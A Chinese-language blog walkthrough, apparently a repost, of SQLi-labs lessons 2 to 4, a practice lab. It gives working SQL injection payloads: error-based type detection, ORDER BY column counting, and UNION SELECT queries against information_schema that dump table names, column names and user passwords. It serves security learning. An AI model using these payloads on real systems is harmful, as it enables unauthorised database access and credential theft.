首页 > 其他 > 详细

Less2-Less4

时间:2020-05-16 23:05:13      阅读:76      评论:0      收藏:0      [点我收藏+]

Less2
GET_数字型注入

0x01 判断注入类型

?id=1
to use near ‘\ LIMIT 0,1‘ at line 1
\ LIMIT 0,1
只有一个\,没有单双引号,说明为数字型
后台查询语句
select username from users where id=1 limit 0,1

0x02 判断显示字段

?id=1 order by 4 --+
报错,有3列

技术分享图片

0x03 查询数据库名

?id=-1 union select 1,database(),user() --+

技术分享图片

0x04 查询表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

技术分享图片

0x05 查询字段名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+

技术分享图片

0x06 查询数据

?id=-1 union select 1,2,group_concat(username,password) from users --+

技术分享图片

Less-3
GET_单引号_小括号_字符型注入

0x01 判断类型

?id=1‘

use near ‘‘1‘‘) LIMIT 0,1‘ at line 1
‘1‘‘) LIMIT 0,1
单引号,单括号

技术分享图片

0x02 判断显示字段

?id=1‘) order by 4 --+

技术分享图片

Less-4
GET_双引号_单括号_字符型注入

0x01 类型判断

?id=1"

 to use near ‘"1"") LIMIT 0,1‘ at line 1
"1"") LIMIT 0,1
双引号,单括号

技术分享图片

0x02 闭合

?id=1") --+

技术分享图片

Less2-Less4

原文:https://www.cnblogs.com/observering/p/12902465.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!